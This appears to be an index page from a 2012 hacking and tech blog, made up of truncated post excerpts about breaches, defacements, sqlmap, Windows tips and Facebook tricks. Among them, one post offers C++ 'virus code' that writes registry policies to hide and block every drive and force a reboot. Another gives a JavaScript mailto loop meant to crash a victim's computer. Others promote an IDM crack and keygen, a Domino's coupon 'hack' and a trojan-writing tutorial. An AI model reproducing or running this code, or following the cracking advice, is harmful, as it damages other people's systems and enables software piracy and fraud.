Hacking Dominos Coupon Generator – Free Dominos Pizza Coupons & Discounts

After multiple failed attempts to place an order of pizza and getting tired of taking follow-ups from folks at Axis Bank and Bill Desk (the gateway that  takes care of Dominos's online pizza orders) , I was frustrated a lot. Then , I came across Domino's Slot machine coupon generator. An innocent looking random coupon generator that is purely JS based and is easily hackable. NOW I AM NOT SAYING I HACKED IT AND ORDERED FREE PIZZA's , the payment gateway sucks soo much that I didn't ordered anything. But yes, I do have something to share with you. Fire up your Google Chrome (that's enough) and open http://pizzaonline.dominos.co.in/slot-machine/process-slot.php You...

[Update] IDM 6.11 with serial key free download full crack patch and keygen Latest version 2012

Internet Download Manager is a download accelator. By using this software we are able download from the Internet at a high speed.But when we are downloading the software from its official site it is not a full version. That is a 30 day trial pack. After these days are past it will ask you to enter serial key or to buy. So here is the process to make any latest downloaded IDM full version.After making this it will be registered for lifetime and not ask to register it further. Here I will describe how can we make an latest IDM full version using some serial keys and adding some tricks. Download Link: http://www.internetdownloadmanager.com/download.html Otherwise...

NSA to Hackers: A Little Help?

"The term 'hacker' is a morally neutral term that is charged with connotation," said Randy Abrams, research director at NSS Labs. "What we are talking about is [the NSA] reaching out to people with exceptional computer skills. Some of these are decent people and some are not; some have political visions that are in line with our government's, and others don't." United States National Security Agency Director Keith Alexander has urged hackers to contribute to securing cyberspace. Speaking at the DEFCON 2012 security conference, Alexander said the hacker community and the U.S. government cybercommunity share some core values. "At DEFCON...

Hackers Use Stolen Passwords to Jimmy Into Dropbox

The habit of using the same username and password combination for multiple sites has come around to bite Dropbox and its users. Network intruders who came into the possession of name/password combos from other sites, tried them out on Dropbox and were able to break into many users' accounts -- including the account of a Dropbox employee, which led to a deluge of spam. Dropbox says reused passwords are to blame for a wave of spam that's hitting subscribers to the service. The company found that usernames and passwords recently stolen from other websites were used to sign in to some Dropbox accounts. One of these accounts belonged to a Dropbox...

The 10 Best Open Source Projects You Should Be Volunteering To Help With

The success of Open Source projects has defied the old saying – too many cooks spoil the broth. If you doubt the success of the open source initiative, you just have to look at Firefox and WordPress, probably two tools that are helping you to read most of the web. Then, you probably are fixing up a date on an Android phone. My colleague X.E.R.O explained Why You Should Contribute To Open Source Projects [Opinion]. You aren’t a coder? Read 8 Ways To Help Open-Source Projects If You’re Not A Coder. You could be a writer, a designer, a translator, just a Facebook or Twitter junkie, or someone who wants to just donate money for the cause. There...

Soon Domain names(Web Addresses) in Indian 22 Indian language

Imagine you are typing a URL like भारत.भारत or भारत.in or you have got a domain name which is in your language say HINDI or BANGLA or MARATHI etc.This sound very interesting to have domain name as the same as what we talk in our Typical regional language. As of now Internet Corporation for Assigned Names and Numbers which is  International non-profit body that oversees allocation of domain names globally. (ICANN) has allowed India to register website addresses in as many as seven regional languages (Hindi, Gujarati, Urdu, Punjabi, Bengali and Telugu)...

Creating undetectable computer virus surprisingly simple

Since the Flame computer virus was discovered earlier this week, much attention has been focused on the cleverness of this piece of malicious code. Some online security experts say the fact that Flame — alternatively known as Flamer or sKyWIper — went unnoticed for two years highlights another problem: the poor state of virus detection. “Why does detection suck so much in the year 2012?” asks Brian Bourne, a Toronto-based cyber-security expert and founder of the SecTor cyber-security conference...

Remove an Outlook e-mail profile or Signout from outlook

An e-mail profile is made up of e-mail accounts, data files, and information about where your e-mail is stored. If you are unfamiliar with e-mail profiles, see overview of Outlook e-mail profiles. 1.In Microsoft Windows, click the Start button, and then click Control Panel. 2.Do one of the following: Windows Vista    Click User Accounts, and then click Mail.  NOTE:   In Classic view, double-click Mail. Microsoft Windows XP    Click User Accounts, and then click Mail.  NOTE:   In Classic view, double-click Mail. 3.The Mail icon won't appear unless you have Outlook installed and have run the program at least once. The Mail Setup dialog box opens. ...

Goodbye Delhi

Finally friends..I have packed my bags up, and i m almost set to leave the heart of India. My stay here was excellent,a great family,bindass people,loads of knowledge and the opportunity of meeting new people and making new contacts.I especially thanks to my mentors and great friends Rohit sir, Naseem  sir ,Naveen sir and Sunil sir and ofcourse Rahul sir who have taught me on how to be more professional and to channelize my energy for the right cause.  I will miss all the friends I have made. Love you Delhi KD  PS: Since I m leaving to a much more jargoned place, expect some delays in web postings and...

41MP Nokia 808 smartphone launches in India

NEW DELHI: Nokia's 41MP camera phone is finally in India. The 41 megapixel smartphone is available on the Nokia Shop at Indiatimes.com at price of Rs 29,999. Nokia PureView 808 has generated lot of interest due to the PureView imaging technology and the gigantic 41-megapixel camera sensor on-board. Other features of the smartphone include Carl Zeiss optics with 4X lossless zoom and Nokia Rich Recording. The smartphone sports a 4-inch 360 x 640 pixel resolution display and is powered by a 1.3 GHz ARM 11 processor. Running on Nokia's Symbian Belle OS, the smartphone comes with a 16GB of internal memory. Nokia 808 PureView is presently available in black colour...

TRICK TO READ PUNJABI FONT POSTS IN MOBILES

TRICK TO READ PUNJABI FONT POSTS IN MOBILES HERE IS THE TRICK TO READ POSTS WRITTEN IN PUNJABI FONTS USING MOBILES. USUALLY THE PUNJABI FONT APPEARS AS BOXES IN MOBILES AND IS NOT READABLE. SO TO READ SUCH POSTS USE THIS TRICK. please follow the instructions carefully and don't change any other setting except the one discribed below.IT MAY CRASH THE SOFTWARE. if some setting is changed accidently then just uninstall the software and reinstall it again. here are the steps 1. DOWNLOAD 'OPERA MINI' SOFTWARE AND INSTALL IN MOBILE (TO INSTALL OPEN m.opera.com in mobile browser and download opera mini  from website) 2. open opera mini and write following command in address bar. before writing erase 'www' which is present by default opera:config...

NASA SSL Digital Certificate hacked by Iranian Hackers

NASA SSL Digital Certificate hacked by Iranian Hackers Iranian hackers 'Cyber Warriors Team' announced in an online post that it compromised an SSL certificate belonging to NASA and subsequently accessed information on thousands of NASA researchers. A space agency representative revealed that they’re currently investigating the incident...

Microsoft Store India got hacked in India !

Today, Hackers from group EvilShadow successfully hack and deface the website of Microsoft Store India (http://www.microsoftstore.co.in) . But Hacker upload his deface page at location http://www.microsoftstore.co.in/evil.html ...

The Hackers Conference 2012 Call For Papers #THC2012

We are extremely delighted to announce the Call for Papers for The Hackers Conference 2012 It is a unique event, where the elite of the hacker world, leaders in the information security industry and the Internet community meet face to face to join their efforts to cooperate in addressing the most topical issues of the IT world. Conference will be held in New Delhi, India and aims to get together industry, government, academia and underground hackers to share knowledge and leading-edge ideas about information security and everything related to it. The following list contains major topics the conference will cover. Please consider submitting...

IBM Research domain hacked and defaced

Hacker collective group dubbed Kosova Hacker Security or in other word KHS targeted IT giant & multinational technology and consulting corporation IBM. In this attack KHS successfully hacked into the official site of IBM Researcher (http://researcher.ibm.com). Hacker collective group dubbed Kosova Hacker Security or in other word KHS targeted IT giant & multinational technology and consulting corporation IBM. In this attack KHS successfully hacked into the official site of IBM Researcher (http://researcher.ibm.com). Hackers claims that, site had a SQL injection & remote code execution vulnerability using which they deface the...

Oracle Database new zero day exploit put users at risk

Oracle Database new zero day exploit put users at risk oracle Oracle has recommended workarounds for a zero-day Oracle Database flaw that was not fixed in the company's April critical patch update. Oracle issued a security alert for Oracle TNS Poison, the vulnerability, disclosed by researcher Joxean Koret after he mistakenly thought it had been fixed by Oracle, allows an attacker to hijack the information exchanged between clients and databases...

Keyloggers (Keystroke Loggers)

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke. There are two types of keystroke loggers: 1. Software based and 2. Hardware based. Spy ware: Spector (http://www.spector.com...

Who Used Your Pc In Your Absence

Who Used Your Pc In Your Absence,what Did He Do?  first you should go start > run >eventvwr.msc  Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived. For our purposes we want the System log. Click on "System" in the left-hand column for a list of events. Look for a date and time when you weren't home and your computer should have been off. double click on the eg: info n it will show u the detail. You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day. Hope u all will like it. Thanks n enj...

How to Protect Your Computer from Keyloggers

Keyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. Below are some methods through which you can protect your computer from keyloggers:  Use a Good Antivirus This is the first and basic step that you need to take in order to protect your computer from keyloggers. Use a Good antivirus such as Kaspersky, Norton or Mcafee and update it regularly. Use a Good Antispyware Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware...

Wi-Fi Compromised ? Track Wi-Fi Hackers Using MoocherHunter

Got a Wi-Fi net connection ? And do you think it is secure enough ? With the onset of cyber crimes taking place,your Wi-fi may be used illegally by hackers or some other people.Either you may get high internet bills in reward or you may be on headlines as your net may be compromised to send malicious emails to anyone,that's what happened in India sometime ago in Mumbai Bomb blast case. Well,there comes MoocherHunter™ to rescue. MoocherHunter™ is a mobile tracking software tool for the real-time on-the-fly geo-location of wireless moochers and hackers. If you have ever wondered about the possibility of your wireless network getting used...

Top 10 Google Chrome Hacks

Top 10 Google Chrome Hacks   1) Load Multiple Sites Every Time You Open Your Browser    To configure your google chrome to load multiple sites every time you open your browser , go to Settin...

Painfully Computer Pranks

Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus,How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;) 1. Crash a Computer System With Nothing But a URL! I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. ...

The top ten technology companies in the world

Apple: $590.82 billion The cream of crop among technology companies is Apple. Already the world’s most valuable company, it is tipped to become the first company to blow past the $1 trillion mark. There were some concerns about growth slowing down after the demise of its iconic founder Steve Jobs died but Tim Cook has been a worthy successor. What’s next? How about a refurbished Apple TV. IBM: $238.07 billion The servers to services behemoth sits pretty in the number two spot. ‘Big Blue’ the 100 plus year old company, has gone through many changes and braved stormy weather when the technology landscape kept changing and its business models were under question. It has emerged unscathed and continues to look optimistically at the future. Microsoft: $264.48 billion Some would say...

Airtel launches 4G services at Rs 999/month

Bharti Airtel, has launched India’s first 4G services in Kolkata today. Airtel , which had bagged BWA spectrum in four telecom circles -- Kolkata, Maharastra, Punjab and Karnataka -- for Rs.3,314.36 crore in 2010, selected Chinese telecom equipment maker ZTE to manage its services in Kolkata. The services are priced between Rs 999 per month to Rs 1999 per month for with a free quota of 6- 9 G...

Windows 7 “God Mode” Has All the Controls

The name would imply much more powerful and potentially devious capabilities, as seen in most games these days.  Instead, the “God Mode” folder for Windows 7 supplies a tidy place to find nearly everything you can do within the Windows Control Panel. To access the special capabilities of the God Mode folder, create a new folder anywhere on your Windows 7 computer and name it: GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} Once renamed, the icon will change to a control panel looking icon, and when opened you will be presented with a plethora of different tweaking options. On my Windows 7 Professional machine, I was shown 274 options....

List of faces, Facebook (2012)

The trick of the year, at least so far, is definitely a bug in the Facebook  system that allows you to insert new and an endless amount of emoticons in chat and messages . Thanks to this trick anyone can create new smileys that you can send to friends (and others) in chat, or use to customize and beautify your messages on Facebook. Today we have gathered for you a list of brand new and unique smileys for Facebook ! To use them, simply copy the code of the emoticon on the cha...

Facebook shortcuts : everyone should know

For FireFox:     Shift+Alt+1: View your News Feed     Shift+Alt+2: View your own Profile     Shift+Alt+3: View pop-up of friend requests     Shift+Alt+5: View pop-up of notifications     Shift+Alt+6: View Account Settings     Shift+Alt+7: View Privacy Settings     Shift+Alt+? : Search bar  For Google Chrome: Alt+?: Search   Alt+1: View your News Feed Alt+2: View your own Profile Alt+3: View pop-up of friend requests Alt+4: View pop-up of messages Alt+5: View pop-up of notifications Alt+6: View Account Settings Alt+7: View Privacy Settings Alt+8: View Facebook’s own profile Alt+9: Read latest Terms of Service agreement...

MULTIPLE LOGIN IN YAHOO MESSENGER

  Multiple login in yahoo Without Using any Software You can login with multiple id’s on the same yahoo messenger without any download or patch . Follow these steps : 1. Go to Start —-> Run . Type regedit, then enter . 2.Navigate to HKEY_CURRENT_USER ——–> Software —>yahoo —–>pager—->Test 3.On the right page , right-click and choose new Dword value . 4.Rename it as Plural. 5.Double click and assign a decimal value of 1. Its done!! Now close registry and restart yahoo messenger and try Multiple Login...

UK Facebook Hacker Jailed For 8 Months

It’s a pretty harsh sentence if you ask me, especially since Facebook decided in July 2011 to start paying bug bounties. I have to say though, this guy must be a pretty talented hacker to break into the Facebook servers – they aren’t exactly low hanging fruit. I’d imagine they are some of the most hammered servers in the World (especially by script kiddies). Sadly, however talented he is, or whatever his intention was in reality – what he did was illegal and he can be punished (fairly harshly) for it...

Automatic SQL Injection Tool – SQLMAP

Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in webapplications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer...

Breaking the Internet: Researchers Successfully Hack SSL

Secure Socket Layers and Transport Layer Security (SSL/TLS) is the foundation of Web security. Banks, travel booking sites, social networks like Facebook and Twitter, email services and a plethora of other industries built their security based on the fact that it is very hard to crack SSL. Yet, a group of researchers has figured out how to do just that. SSL encryption protects data in transit from the client to the server. This communication happens very rapidly and the encryption effectively makes a secure tunnel for information. The researchers that have cracked SSL used a vulnerability that until now was considered only a theory. Like wormhole...

Plesk control panel bug left FTC sites (and thousands more) exposed to Anons

A critical vulnerability in some versions of Parallels' Plesk Panel control panel software appears to have been key to the recent penetration of two servers hosting websites for the Federal Trade Commission. The vulnerability in the software, which is used for remote administration of hosted servers at a large number of Internet hosting companies, could spell bad news for hosting providers who haven't applied the latest updates, as well as their customers. Because the vulnerability allows someone to make significant changes to the user accounts, files, and security of a targeted site, hackers who took advantage of the Plesk vulnerability...

Export Excel CSVs with Double Quotes

Excel allows you to save spreadsheets using CSV file format. This particularly helpful as you or your client may have data, say a product catalogue, that can be imported into another application. Continuing the example you may want to import this data into a shopping cart system like Magento. This all sounds good so far but Microsoft in their wisdom don't allow you to alter preferences for the CSV file format. Excel does it's own thing and if that does not match your way or the software you want to import the data into then things get a little more complicat...

New Steganography method TranSteg hides Data in VoIP(IP Telephony)

Researchers from Warsaw University of Technology, Institute of Telecommunications find a new Steganography method that helps to hide the Data in VoIP(IP Telephony).  The method is named as "TranSteg((Transcoding Steganography)".   Voice over IP (VoIP), or IP telephony, is one of the services of the IP world that is changing the entire telecommunication’s landscape. It is a real-time service, which enables users to make phone calls through data networks that use an IP protocol...

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also. C++ Virus Code : #include < windows.h > #include < fstream.h > #include < iostream.h > #include < string.h > #include < conio.h > int main() { ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/ write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked...

Automatic SQL Injection Tool – SQLMAP

Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit...

Flash Tutorial Links

Most of the times I have been intrigued by the quality of flash based games and animations which appear on net and dazzle the netizens.I always thought of learning Adobe Flash (previously Macromedia flash) and to create my own animations and games. However,due to lack of good tutorials I wasn’t able to learn much about it and my bandwidth don’t permits me to download all the video tutorials the deviants of flash had to offer.So I have compiled a list of tutorials and resource website which offer fantastic flash resources and tutorials for those who crave for them. I found these flash actionscript tutorials while stumbling across the net.Many...

NSDECODER – automatic Malware detection tool

Nosec has introduced NSDECODER which is a automated website malware detection tools. It can be used to decode and analyze weather the URL exist malware. Also, NSDECODER will analyze which vulnerability been exploit and the original source address of malware. Functionality Automated analyze and detect website malware. Plenty of vulnerabilities. Log export support HTML and TXT format. Deeply analyze JavaScript.  ...

Make a simple Trojan in VB

Visual Basic is an easy programming language.So easy that most of advanced programmers don't even compare it to behemoths like C/Pascal/C++/PERL etc.But it seriously packs punch due to its ease in programming and predefined procedures.Earlier wrote on how to lock keyboard and mouse using VB. This time I will be discussing on how to write a simple trojan in VB .Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will...
Page 1 of 7512345Next

 
Design by gitstein | Bloggerized by Kuldeep